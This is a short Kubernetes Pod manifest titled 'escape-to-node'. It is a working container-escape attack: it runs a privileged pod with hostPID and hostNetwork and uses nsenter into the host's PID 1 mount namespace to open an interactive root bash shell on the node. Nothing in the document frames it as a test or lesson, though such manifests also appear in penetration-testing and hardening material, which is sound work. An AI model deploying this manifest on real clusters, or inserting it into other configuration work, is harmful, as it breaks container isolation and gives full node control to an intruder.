apiVersion: v1
kind: Pod
metadata:
  name: escape-to-node
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: ubuntu
    image: ubuntu
    command: ["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"]
    tty: true
    stdin: true
    securityContext:
      privileged: true
